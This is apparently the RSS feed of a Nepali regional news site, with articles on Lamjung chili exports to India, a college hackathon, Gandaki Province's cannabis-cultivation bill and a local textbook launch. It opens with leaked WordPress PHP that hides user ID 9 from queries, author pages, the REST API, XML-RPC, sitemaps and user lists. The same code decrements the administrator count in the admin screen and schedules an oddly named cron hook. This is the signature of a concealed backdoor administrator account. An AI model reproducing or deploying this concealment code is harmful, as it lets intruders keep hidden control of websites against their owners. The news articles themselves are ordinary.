add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
उद्योग/वाणिज्य – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceFri, 24 Jul 2026 12:06:39 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgउद्योग/वाणिज्य – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232लमजुङको अकबरे खुर्सानी भारत जान थाले पछि बजारमा सहजता, २७ लाखको आम्दानी, डेढ करोड कमाउने लक्ष्य
https://www.antaranganews.com/?p=50176
https://www.antaranganews.com/?p=50176#respondMon, 20 Jul 2026 13:31:48 +0000https://www.antaranganews.com/?p=50176कुन्छा(लमजुङ)– लमजुङमा अकबरे खुर्सानीको व्यवसायिक खेती गरेका स्थानीय क्षेत्रका दुई वडाका किसानले २७ लाखको आम्दानी गरी सकेका छन् । उनीहरूले यही सिजनमा कुल डेढ करोडसम्म कमाउने लक्ष्य रहेको सो खेतीको बजार व्यवस्थापकको भनाइ छ । यतिबेला आफूले उत्पादन गरेको अकबरे खुर्सानी झापाको काँकडभिट्टा नाका हुँदै भारतमा समेत जान थालेको हुँदा बजारमा सहजता भएकोले कृषकहरू हर्षित एवम् उत्साहित भएका छन् ।
लमजुङको सुन्दरबजार नगरपालिका– १ र २ वडाका किसानहरूले लगाएको अकबरे खुर्सानीको व्यवसायिक खेतीबाट त्यतिको आम्दानी सुनिश्चित गरिएको हो । त्यसको बजार व्यवस्थापन गर्ने एक पौरखी महिला सुन्दरबजार नगरपालिका– १ कु्न्छाकी सन्तोषी गौली हु्नुहुन्छ । सामाजिक अभियन्ताका रुपमा परिचय बनाउने सफल गौली, स्थानीय क्षेत्रमा महिलाहरूले सञ्चालन गरेको भागीरथी सामाजिक उद्यमी महिला सहकारी संस्था लिमिटेडको अध्यक्ष समेत हुनुहुन्छ । उहाँले सो सहकारीमार्फत महिलालाई बाख्रा पालनको काममा प्रोत्साहित गरेर बडादशैंको बेलामा उत्पादित खसी बोकाको विक्री प्रवन्ध समेत सहकारीमार्फत गरी आउनु भएको छ । सदस्यहरूको कृषि उपजको बजारीकरणको सहजताका लागि उहाँ नेतृत्वको समितिले सहकारी संस्थाका नाउँमा एक मिटी ट्रक समेत खरिद गरेको उहाँको भनाइ छ । सहकारीको गाडीलाई काम दिनका लागि बिक्रीको जिम्मा :
यतिबेला त्यो गाडीले काम नपाएर थन्क्याउनु पर्ने स्थिति बनेको छ । त्यो स्थितिलाई ध्यानमा राख्दै उहाँले जुक्ति निकाल्नु भयो । त्यो गाडीलाई काम पनि हुने, गाउँले किसानले फलाएको अकबरे खुर्सानीले बजारीकरणका लागि सहज पनि हुने हुँदा त्यसको खरिद बिक्रीको काम किन नगर्ने ? यो ठानेर त्यो कामको जिम्मेवारी आफूले लिएको सन्तोषीले बताउनु भयो । ‘मैले दुवै वडाका प्रत्येक गाउँमा गएर अकबरे खुर्सानी उत्पादन गर्ने किसानहरूलाई होलसेल मूल्यमा खरिद गरी त्यसको बजार प्रवन्ध आफूले गरिदिने जानकारी दिए ।’ उहाँले भन्नुभयो, ‘किसानी पेशा व्यवसाय गरेका दिदी बहिनी, दाजुभाइ खुशी हुँदै एकै बचनमा हुन्छ भन्नुभयो र मैले यो काम सुरु गरेकी हुँ ।’ गौली आफैले पनि अकबरे खुर्सानीको २ रोपनीमा खेती गरेको जानकारी दिनु भयो । समूहमा उत्पादनको काम गर्दा सहज :
अकबरे खुर्सानीको मुख्यबजार पोखरा, काठमाडौं, मुग्लिङ, नारायणगढ हो, पछिल्ला दिनमा झापाको काँकडभिट्टा नाका हुँदै भारतमा समेत जान थालेको हुँदा बजारमा सहजता भएको छ सन्तोषीको भनाइ छ । उहाँका अनुसार गत वर्ष यस क्षेत्रका किसानहरूले एक्ला एक्लै अकबरे खुर्सानीको उत्पादन बिक्रीको प्रयास गर्नु भयो । त्यसो हुँदा त्यसका लागि उहाँहरूलाई बजार खोज्न गाह्रो भएको थियो । ऐले सामुहिक रुपमा यसरी काम गर्दा सहज भएको गौली बताउनु हुन्छ । उहाँले भन्नुभयो, ‘एक पटकमा २० देखि २५ क्विन्टलसम्म ढुवानी गर्ने गरेको छ, पहाडको ठाउँमा दुई चार जना किसानले त्यति धेरै उत्पादन गर्न गराउन प्रायः सम्भव नभएको हुँदा समूहमा काम गर्दा सहज भएको छ ।’ खुर्सानी त प्रत्येक २, ३ दिनमा पाकेर टिप्न योग्य हुन्छ धेरै दिन राख्दा सड्ने पनि डर हुन्छ ताजा विक्रीको प्रवन्ध हुँदा राम्रो हुने उहाँले उल्लेख गर्नु भयो । कृषक समूहमार्फत व्यवसायिकता :
सुन्दरबजार नगरपालिका कार्यालयमा ‘लेखपानी कृषक समूह’ नामक संस्था दर्ता गरेर नै अकबरे खुर्सानीको व्यवसायिक खेतीलाई व्यवस्थित गर्न लागेको सो समूहका अध्यक्ष मिलन केसीले बताउनु भयो । नेपाली सेनाबाट निवृत्त हुनुभएका उहाँले भन्नुभयो, ‘करिब आठ वर्ष सेक्युरिटी गार्डकोसमेत काम गरेँ, विदेश गएका दाजुभाइको हालत पनि नजिकबाट अनुभूति गरेको छु । त्यो भन्दा त आफ्नै गाउँठाउँमा परिवारको साथमा रहेर यही पेशा गर्नु ठीक लागेकोले आफू र छिमेकीहरूलाई पनि अकबरे खुर्सानी खेती गर्न लगाएको हुँ ।’ उहाँका अनुसार काठमाडौैंमा बस्दा अकबरे खुर्सानी किलोको ३– ४ सय रुपैयाँमा बिक्री भएको देखेको थिए । उहाँले भन्नुभयो, ‘आफ्नै छिमेकी गाउँका गोवर्द्धन गौलीले समेत त्यो लगायतको फलफूल खेती गरेको देख्दा हाम्रो गाउँ क्षेत्रमा पनि गरेमा हुने रहेछ भन्ने बुझेर आफू यसतर्फ लोभिएको हुँ ।’ समूहबाट ११८ रोपनीमा खेती : गोवर्द्धन गौली गुरु
गोवर्द्धन गौलीलाई हामीहरूले यो खेतीका लागि गुरु नै मानेका छौं उहाँले भन्नुभयो । गत वर्ष उहाँले नै निःशुल्क रुपमा दिनु भएको अकबरे खुर्सानीको करिब एक केजी विउबाट गाउँलेहरू मिलेर समूहमा सामुहिक रुपमा र व्यक्तिगत पनि खेती गरियो अध्यक्ष केसीले भन्नुभयो । उहाँले भन्नुभयो, ‘यो वर्ष आफैंले उत्पादन गरेको विउबाट खेती गरेका छौं ।’ उहाँका अनुसार आफूले व्यक्तिगत रुपमा नौ रोपनीमा खेती गरेको छु । गत वर्ष २७ सय विरुवा लगाउँदा खर्च कटाएर करिब तीन लाख नाफा भएको थियो, त्यसैले ऐले ३६ सय विरुवा रोपेको छु उहाँले भन्नुभयो । हामीले लेखपानी कृषक समूहबाट ११८ रोपनीमा खेती गरेको उहाँले जानकारी दिनुभयो । यतिबेला आफ्नो लेखपानी कृषक समूहमा २८ घरपरिवार किसान जोडिएको र यही साउन महिनाभित्रै त्यो संख्या बढेर कम्तिमा ५० जना पुग्ने स्थिति रहेको उहाँले उल्लेख गर्नुभयो । बिक्रीको टन्टो नहोस् भनेर सन्तोषीसँग सम्झौता :
सोही लेखपानी कृषक समूहमा आवद्ध हुनु भएका सदस्य सोमबहादुर दुराले यो वर्ष आफूले अकबरे खुर्सानीका १२ हजार विरुवा रोपेको बताउनु भयो । ऐलेसम्म ५० क्विन्टल विक्री गरेको उहाँले जानकारी दिनुभयो । उहाँले भन्नुभयो, ‘गएको माघ महिनाको अन्तिममा ब्याडबाट विरुवा उखेलेर सारेको हो, हामीले जेठको अन्तिम समयदेखि त्यसको फल टिप्न सुरु गरेका हौं ।’ आउँदो कार्तिक महिनाको अन्तिमसम्म टिप्छौं, फल्दै पनि छ कति बोटमा उहाँले भन्नुभयो ।
के कसरी बिक्री गर्ने गर्नु भएको छ ? भन्ने जिज्ञासामा गत वर्ष हामीहरूले एक्ला एक्लै बिक्रीको प्रयास गर्दा बजारको निकै समस्या झेल्नु पर्यो । ‘ऐले त्यस्तो नहोस् भनेर समयमै सन्तोषी गौलीसँग सम्झौता गरेका छौं, उहाँ साहसी महिला हुनुहुन्छ, उहाँले आफूले घाटा सहेर पनि हामीलाई मर्का नपार्ने कुरा गर्नु भएको छ, ऐलेसम्म पाएको मूल्यमा हामी सन्तुष्ट छौं’ उहाँले भन्नुभयो । अब त हाम्रो हामीले उत्पादन गरेको खुर्सानी इण्डिया पनि जान थाल्यो भन्ने सुनेका छौं, धेरै खुशी लागेको छ सोमबहादुरले हर्षित एवम् गर्वित हुँदै भन्नुभयो ।
सुन्दरबजार नगरपालिका– १ को पूर्व वडाध्यक्ष समेत रहनु भएका सूर्यबहादुर दुराले यो वर्ष आफूले आठ हजार विरुवा रोपेको बताउनु भयो । ‘यो वर्ष पानी अलिक बढी प¥यो, ढुसी पर्ने, चिसोले जरा कुहिने र बोट ओइलाएर मर्ने भएकोले घाटा पर्ने भयो ।’ उहाँले भन्नुभयो, ‘ऐलेसम्म ३५ सय बोट सुकीसक्यो, अरु पनि सुक्दैछ । भरखर फल्न लागेको थियो, टिप्ने बेला हुनु अघि नै बोट मरेर, अरु बोट पनि सुक्दैछ, नोक्सान हुने भयो ।’ बीमा गर्नु भएको छैन ? अनि त्यो नोक्सानीका बारेमा नगरपालिका जिल्ला कृषि विकास कार्यालय आदिमा जानकारी गराउनु भएको छैन ? भन्ने जिज्ञासामा बीमाका बारेमा थाहा भएन, यस्तो भयो भनेर कतै भन्न त गएको छैन उहाँले सुनाउनु भयो ।
चार ठाउँमा खेती गरेकोमा दुई ठाउँको त सबै बोट मर्यो, दुई ठाउँमा लागेको फल आजसम्म पाँच क्विन्टल जति विक्यो होला बोट मर्दैछ, खर्च मात्रै धान्ने जस्तो छ सूर्यबहादुर दुराले थप जानकारी दिनुभयो । ओभरसियरको जागिर र विदेश जाने योजना रद्द :
यसैगरी, उक्त समूहका अर्का सदस्य भरत तिवारीले आफूले १० वर्र्षसम्म खाएको ओभरसियरको जागिर छोडेर, विदेश जाने सपना समेत त्यागेर अकबरे सुर्खानीको यही खेतीमा रमाएको बताउनु भयो । उहाँका अनुसार विदेश जाने योजनामा थिए । अचानक दाजु माधवको निधन (पाँच महिना अघि) भयो, यो खेती उहाँले भन्नुभयो,सुरु गर्नु भएको हो, ऐले मैले सम्हालेको छु । ‘अब विदेश जाने सोच हराएको छ ।’ बाँदरले समेत नखाने हुँदा अकबरे खुर्सानीमा आकर्षण बढ्दो :
अकबरे खुर्सानीको उत्पादनलाई बाँदरले समेत नोक्सान नगर्ने, नखाने भएको यो खेती नगदेबाली समेत भएको हुँदा यो खतीतर्फ सर्बसाधारणमा आकर्षण बढ्दो रहेको समेत भरत तिवारीले जानकारी दिनुभयो । उहाँले भन्नुभयो, ‘अकबरे खुर्सानीलाई बाँदरले समेत नखाने, नबिगार्ने भएको हुँदा राम्रो हुन्छ भन्ने लागेको छ ।’ यो खेती गर्नका लागि पहारिलो, पानी नजम्ने खेत वा पाखोबारी, खरबारी राम्रो हुने आफ्नो अनुभव रहेको तिवारीले सुनाउनु भयो ।
अकबरे खुर्सानीको व्यापारको जिम्मा लिनु भएकी सामाजिक अभियन्ता एवम् भागीरथी सामाजिक उद्यमी महिला सहकारी संस्था लि.की अध्यक्ष सन्तोषी गौलीले आफूले किसानहरूले उत्पादन गरेको अकबरे खुर्सानी १० देखि १५ क्विन्टल एक पटकमा ढुवानी गरी लग्ने गरेको जानकारी दिनुभयो । उहाँका अनुसार दुवै वडाका किसान दिदी बिहिनी तथा दाजुभाइले उत्पादन गर्नु भएको अकबरे खुर्सानी प्रायः दुई दिनमा नभए पनि तीन दिनको बीचमा एक ट्रिप पुग्ने गरेको छ । उहाँले भन्नुभयो, ‘ऐले त भारतमासमेत जान थालेको हुँदा बजारको समस्या छैन ।’ बजारमा अकबरे खुर्सानीको मूल्य भने स्थिर नभएको उहाँले जानकारी दिनु भयो । हरेक पटक फरक फरक मूल्यमा बिक्री गर्नु पर्ने बाध्यता भने रहेको उहाँको भनाइ छ । जिल्लाका अन्य क्षेत्रबाट पनि विक्री गरिदिन अनुरोध आउन थालेको छ सन्तोषी गौलीले गर्वका साथ सुनाउनु भयो ।
]]>
https://www.antaranganews.com/?feed=rss2&p=501760उत्साहवर्द्धक रह्यो ४८ घण्टे राष्ट्रिय ह्याकाथनको पहिलो दिन
https://www.antaranganews.com/?p=50000
https://www.antaranganews.com/?p=50000#respondSun, 12 Jul 2026 01:32:50 +0000https://www.antaranganews.com/?p=50000काठमाडौं– प्रविधिमार्फत नवप्रवर्तन र सिर्जनशीलतालाई प्रोत्साहन गर्ने उद्देश्यले अर्किड इन्टरनेशनल कलेजद्वारा आयोजित ‘Orchid HackX २०२६’ को पहिलो दिन उत्साहपूर्ण वातावरणमा सम्पन्न भएको छ । ४८ घण्टे राष्ट्रिय ह्याकाथनको पहिलो दिन सहभागी टोलीहरूको दर्ता, अभिमुखीकरण तथा परियोजना विकास (Development Phase) को औपचारिक सुरुवात गरिएको कलेजले जनाएको छ ।
देशभरबाट छनोट भएका युवा विद्यार्थी तथा प्रविधिप्रेमीहरू पहिलो दिनदेखि नै नवीन सोचलाई व्यवहारमा उतार्ने तयारीमा जुटेका छन् । सहभागीहरूले एकअर्कासँग विचार आदान–प्रदान गर्दै साइबर सुरक्षा, आर्टिफिसियल इन्टेलिजेन्स (AI), मेसिन लर्निङ (ML), ओपन इनोभेसन तथा सूचना प्रविधिसँग सम्बन्धित विविध समस्याको समाधान विकास गर्न थालेका छन् ।
आयोजकका अनुसार आगामी ४८ घण्टासम्म निरन्तर सञ्चालन हुने ह्याकाथनमा सहभागीहरूले वास्तविक समस्याको समाधान खोज्ने डिजिटल उत्पादन तथा प्रविधिमा आधारित नवीन परियोजनाहरू तयार पार्नेछन् । यस अवधिमा उद्योग, शैक्षिक संस्था तथा प्रविधि समुदायबीच सहकार्य, सिकाइ र अनुसन्धानलाई पनि प्राथमिकता दिइनेछ ।
कलेजले पहिलो दिनको वातावरणलाई अत्यन्त ऊर्जाशील, सिर्जनात्मक र प्रतिस्पर्धात्मक रहेको जनाएको छ । सहभागीहरूको उत्साह र नवीन सोचले नेपालमा नवप्रवर्तनको संस्कृतिलाई थप मजबुत बनाउने विश्वास आयोजकको छ ।
अर्किड इन्टरनेशनल कलेजले सूचना प्रविधि तथा व्यवस्थापनका विभिन्न शैक्षिक कार्यक्रमहरूमा समेत भर्ना खुला रहेको जनाएको छ । कलेजमा B.Tech in Artificial Intelligence (AI), BIT, BSc CSIT, BCA, BITM, BBM, BBA, MBA, BSW tyf BA in Psychology कार्यक्रम सञ्चालन हुँदै आएका छन् ।
कलेजले कृत्रिम बुद्धिमत्ता (AI), डिप लर्निङ, डाटा साइन्स, कम्प्युटर भिजन, साइबर सुरक्षा, सफ्टवेयर इन्जिनियरिङ, इन्टरनेट अफ थिङ्स (IoT), रोबोटिक्स लगायतका अत्याधुनिक प्रविधि क्षेत्रमा दक्ष जनशक्ति उत्पादन गर्ने लक्ष्यका साथ आधुनिक शिक्षण प्रणाली अवलम्बन गर्दै आएको जनाएको छ ।
गौशाला, काठमाडौंस्थित कलेजले इच्छुक विद्यार्थीहरूलाई सम्बन्धित शैक्षिक कार्यक्रमहरूमा समयमै आवेदन दिन आग्रह गरेको छ । HackX २०२६ मार्फत नेपाली युवाहरूलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरका प्रविधिगत चुनौतीहरूको समाधान विकास गर्न प्रेरित गर्दै नवप्रवर्तनमुखी समाज निर्माणमा योगदान पुग्ने अपेक्षा गरिएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=500000अन्ततः गण्डकी प्रदेश सभाबाट पारित भयो गाँजा विधेयक : एकै पटक पाँच वर्षसम्मका लागि अनुमति लिन सकिने
https://www.antaranganews.com/?p=49922
https://www.antaranganews.com/?p=49922#respondFri, 10 Jul 2026 03:42:09 +0000https://www.antaranganews.com/?p=49922पोखरा– अन्ततः गण्डकी प्रदेश सभाबाट गाँजा खेतीले बैधानिकता प्राप्त गरेको छ । औषधीजन्य तथा औद्योगिक प्रयोजनाका लागि गाँजा खेतीलाई नियमन र व्यवस्थापन गर्न बनेको विधेयक प्रदेश सभाले असार २५ गते पारित गरेसंगै गाँजा खेतीका लागि बाटो खुलेको हो ।
उद्योग तथा पर्यटन मन्त्री यशोदा रिमालले पेश गर्नु भएको अर्थ तथा विकास समितिको प्रतिवेदनसहित औषधीजन्य तथा औद्योगिक प्रयोजनका लागि गाँजाखेतीलाई नियमन गर्ने सम्बन्धमा व्यवस्था गर्न बनेको विधेयक सर्वसम्मत पारित भएको सभामुखले घोषणा गर्नु भएको हो । गाँजा खेती गर्न चाहने व्यक्ति लागुऔषध कसुरमा सजाय नपाएको हुनुपर्छ । व्यक्तिले विगत १० वर्षमा लागुऔषधसम्बन्धी कसूरमा सजाय नपाएको स्वघोषणा गर्नुपर्ने व्यवस्था विधेयकमा राखिएको छ ।
सरकारले संसद्मा दर्ता गराएको मूल विधेयकलाई प्रदेश सभाको अर्थ तथा विकास समितिले लामो छलफल र परिमार्जनसहित संशोधन प्रतिवेदन सभामा पेस गरेको थियो । सोही संशोधनसहितको विधेयक बिहीबारको बैठकबाट पारित भएको हो ।
विधेयक छलफलका लागि अर्थ तथा विकास समितिमा पठाइएकोमा २४ गते समिति सभापति भोजराज अर्यालले प्रतिवेदन प्रदेश सभामा पेश गर्नु भएको हो । विधेयकमा गाँजाको दुरुपयोग रोक्नका लागि विशेष प्रावधानहरू थपिएका छन् । गाँजाको औषधीय प्रयोगबाट हुन सक्ने सम्भावित जोखिम कम गर्न चिकित्सा सेवासहितको उपचार केन्द्र सञ्चालन गरिने उल्लेख गरिएको छ । दुरुपयोग गर्नेलाई कारबाही गर्ने र उपचारका लागि पुनस्स्थापना केन्द्र सञ्चालन गर्ने जिम्मा सरकारको हुनेछ । खेती गर्ने जग्गा आफ्नै हुनुपर्छ भन्ने छैन ।
प्रदेशसभाको अर्थ तथा विकास समितिका सभापति भोजराज अर्याल ले विधेयक गण्डकी प्रदेशको आर्थिक समृद्धिको ‘गेम चेन्जर’ बन्न सक्ने विश्वास व्यक्त गर्नुभयो । उहाँका अनुसार, निश्चित मापदण्ड पूरा गरेका कुनै पनि कम्पनीले ऐनको परिधिभित्र रहेर गाँजा खेती, उत्पादन, प्रशोधन, बिक्री–वितरण तथा उद्योग सञ्चालन गर्न सक्नेछन् । उहाँले भन्नुभयो, ‘आज प्रदेशसभाले विधेयक पारित गरेको छ । अब प्रदेश प्रमुखबाट प्रमाणीकरण भएपछि ऐन कार्यान्वयनमा आउनेछ। त्यसपछि नियमावली बनाएर अनुमति दिने प्रक्रिया सुरु हुनेछ ।’ अनुमतिपत्रको अवधि ५ वर्ष :
गाँजा खेतीको अनुमति, नवीकरण, निलम्बन र खारेजीका विषयमा पनि स्पष्ट कार्यविधि तय गरिएको छ । सरकारी संयन्त्रमा कम्पनी दर्ता गरी खेतीको अनुमति लिन सकिने छ । यसका लागि लाग्ने दस्तुर र प्रक्रियाबारे सरकारले नियमावलीमा खुलाउने छ । औषधीजन्य प्रयोजन र औद्योगिक प्रयोजनका लागि अलग–अलग दर कायम हुने गरी दस्तुर तोकिने विधेयकमा उल्लेख छ । यसरी लिइने अनुमतिपत्रको अवधि ५ वर्षको हुनेछ र अवधि सकिनु अगावै तोकिएको दस्तुर बुझाई नवीकरण गराउनुपर्नेछ ।
प्रदेश सरकारले तल्लो तहको सिफारिसमा राजपत्रमा सूचना प्रकाशन गरी गाँजाखेती गर्न पाउने विशिष्ट जिल्ला वा स्थानीय तहको क्षेत्र तोक्नेछ । मूल विधेयकमा खाली, बाँझो वा न्यून उत्पादकत्व भएको जमिनमा खेती गर्ने भन्ने व्यवस्था गरेकोमा समितिको प्रतिवेदनले त्यसलाई संशोधन गरी विशेष क्षेत्र तोक्ने गरी उल्लेख गरेको हो । खेती गर्न इच्छुकले तोकिएको क्षेत्रभित्र आफ्नो जमिन वा कम्तीमा ५ वर्षका लागि भाडा÷लिजमा लिएको जमिनको विवरण, स्थानीय तहको सिफारिस, उत्पादित गाँजा खरिद गर्ने सुनिश्चितता भएको स्थापित औषधि उद्योग वा उत्पादनमूलक उद्योगसँग गरिएको सम्झौता पत्र संलग्न गरी नियामक इकाइमा आवेदन दिनुपर्नेछ ।
गाँजाखेतीको दुरुपयोग रोक्न र यसलाई व्यवस्थित बनाउन त्रि–स्तरीय नियमन संयन्त्रको व्यवस्था गरिएको छ । मुख्यमन्त्रीको अध्यक्षतामा कृषि, स्वास्थ्य, उद्योग, वन मन्त्री, प्रमुखसचिव र प्रदेश प्रहरी प्रमुखसमेत सदस्य रहने उच्चस्तरीय निर्देशन समिति रहनेछ । मन्त्रालयमातहत नवौं वा दशौं तहको अधिकृतको नेतृत्वमा गाँजा खेती नियमन तथा व्यवस्थापन इकाइ रहनेछ । संसदीय समितिले मूल विधेयकमा रहेको निर्देशकको एकल अधिकार कटौती गरी धेरै ठाउँमा इकाइलाई संस्थागत जिम्मेवारी दिएको छ । लाइसेन्स जारी गर्ने, खारेज गर्ने र नियमन गर्नेलगायत काम यसै इकाइले गर्नेछ ।
पूर्व सहमति प्राप्त गरेपछि निवेदकले खेती गरिने क्षेत्रमा अनधिकृत व्यक्तिको प्रवेश रोक्न बलियो पर्खाल वा तारबार लगाउनुपर्नेछ । सुरक्षाका लागि आवश्यक परे सिसीटिभीसहितको पूर्वाधार तयार गर्नुपर्नेछ । पूर्वाधार पूरा भएपछि मात्र इकाइले स्थलगत निरीक्षण गरी उद्योगको क्षमता पहिचान गरेर गाँजा खेतीको अन्तिम अनुमतिपत्र जारी गर्नेछ ।
वडा तहमा वडाध्यक्षको संयोजकत्वमा प्रहरी प्रतिनिधि, स्थानीय तहको कृषि शाखा प्रमुख, कृषक प्रतिनिधि र वडा सचिव सदस्य रहने समितिले स्थलगत रूपमा खेतीको अनुगमन गर्नेछ । पारित विधेयकमा गाँजामा पाइने रासायनिक पदार्थ टेट्राहाइड्रोक्यानाबिनोल (टिएचसी) मात्रा नियन्त्रणमा विशेष ध्यान दिइएको छ । औद्योगिक प्रयोजनका लागि गरिने गाँजाखेतीमा टिएचसीको मात्रा ० दशमलब ३ प्रतिशतभन्दा बढी हुन नहुने सीमा तोकिएको छ ।
बोट कटान, भण्डारण, प्रयोग वा बिक्री वितरण गर्नुअघि प्रयोगशालामा अनिवार्य रूपमा रासायनिक परीक्षण गरी टिएचसीको मात्रा जाँच गर्नुपर्ने कानुनी प्रावधान थपिएको छ । यसका लागि प्रदेश सरकारले आफ्नै वा साझेदारीमा प्रयोगशाला स्थापना गर्नेछ । विधेयकमा भाँगोलाई स्पष्ट रूपमा परिभाषित गरिएको छ । छोप, अचार र चटनी बनाउनका लागि खाद्यवस्तुका रूपमा प्रयोग गरिने गाँजाको बोटमा फल्ने दानालाई भाँगो भनिएको छ । यसलाई औद्योगिक कच्चा पदार्थअन्तर्गत वर्गीकरण गरिएको छ । सर्तविपरीत गाँजा खेती गरेमा कारबाही :
खेतीपछि बिक्रीको व्यवस्था पनि विधेयकमा निकै कडाइ गरिएको छ । रोप्नेदेखि वयस्क हुँदासम्म सरकारको निगरानीबिना केही गर्न पाइँदैन । गाँजाको बोट तयार भएपछि त्यसलाई कटान, भण्डारण र बिक्री गर्दा इकाइ, नजिकको प्रहरी कार्यालय र स्थानीय निगरानी समितिलाई पूर्वजानकारी गराउनुपर्ने हुन्छ ।
अनुमतिबिना वा तोकिएका सर्तविपरीत गाँजा खेती गरेमा कारबाहीको भागिदार हुनुपर्ने व्यवस्था पनि विधेयकमा छ । अनुमति नलिई खेती गरेमा, तोकिएको क्षेत्रभन्दा बाहिर वा स्वीकृत क्षेत्रफलभन्दा बढी जमिनमा खेती गरेमा वा इजाजतविपरीत अन्य व्यक्तिलाई गाँजा बिक्री वितरण गरेमा संघीय कानुन अर्थात् लागुऔषध ऐन, २०३३ बमोजिम कारबाही र सजाय हुनेछ । तोकिएबमोजिमको अभिलेख वा विवरण नराखेमा, समयमा विवरण नपठाएमा वा अनुमतिविना सिलबन्दी नगरी ओसारपसार गरेमा निरीक्षकको प्रतिवेदनका आधारमा इकाइले ५० हजार रुपैयाँदेखि ५ लाख रुपैयाँसम्म जरिवाना गर्न सक्नेछ । तर, जरिवानाको सजायउपर चित्त नबुझे सम्बन्धित व्यक्ति वा संस्थाले निर्णय भएको ३५ दिनभित्र सम्बन्धित जिल्ला अदालतमा पुनरावेदन दिन पाउने छ ।
विधेयकमा गाँजाको व्यावसायिक खुलापनसँगै आउन सक्ने सामाजिक जोखिमको ख्याल गरिएको छ । प्रदेश सरकारले लागूऔषध वा गाँजा दुव्र्यसनको उपचार तथा पुनःस्थापनाका लागि चिकित्सा सेवासहितको पुनः स्थापना केन्द्र स्थापना र सञ्चालन गर्नुपर्ने व्यवस्थालाई अनिवार्य गरिएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=499220मर्स्याङ्दी गाउँपालिकाले तयार गरेको स्थानीय पाठ्य पुस्तक ‘हाम्रो मर्स्याङ्दी’को विमोचन
https://www.antaranganews.com/?p=49851
https://www.antaranganews.com/?p=49851#respondSat, 04 Jul 2026 11:02:14 +0000https://www.antaranganews.com/?p=49851भूलभूले(लमजुङ)– लमजुङको मर्स्याङ्दी गाउँपालिकाले तयार गरेको ‘हाम्रो मस्र्याङ्दी’ नामक पाठ्यपुस्तकको विमोचन भएको छ । गाउँपालिका अध्यक्ष अर्जुन गुरुङ, उपाध्यक्ष जुनामाया थापा, प्रमुख प्रशासकीय अधिकृत विज्ञान पौडेल र सामाजिक विकास समिति संयोजक एवम् वडा ७ का वडाअध्यक्ष तिलबहादुर गुरुङलगायतले संयुक्त रुपमा पाठ्यपुस्तकको असार २० गते विमोचन गर्नु भएको हो ।
चालु शैक्षिक सत्रदेखि पठनपाठन सुरु गरिएको उक्त पाठ्यपुस्तक २१ औँ गाउँसभाको अवसरमा आयोजित कार्यक्रममा विमोचन गरिएको हो । उक्त पाठ्यपुस्तक बारेमा प्रकाश पार्दै गाउँपालिका अध्यक्ष गुरुङले स्थानीय इतिहास, भूगोल, संस्कृति, प्राकृतिक सम्पदा, पर्यटन, आर्थिक गतिविधि, स्थानीय पेशा– व्यवसाय, यातायात तथा भौतिक पूर्वाधार, जीवनोपयोगी सीप रहेको जानकारी दिनु भयो । उहाँका अनुसार सो पुस्तकमा मानव मूल्यमा आधारित शिक्षा, स्थानीय परिकार र समसामयिक विषयबारे विद्यार्थीलाई व्यवहारिक ज्ञान दिने उद्देश्यले पाठ्यपुस्तक तयार पारिएको हो ।
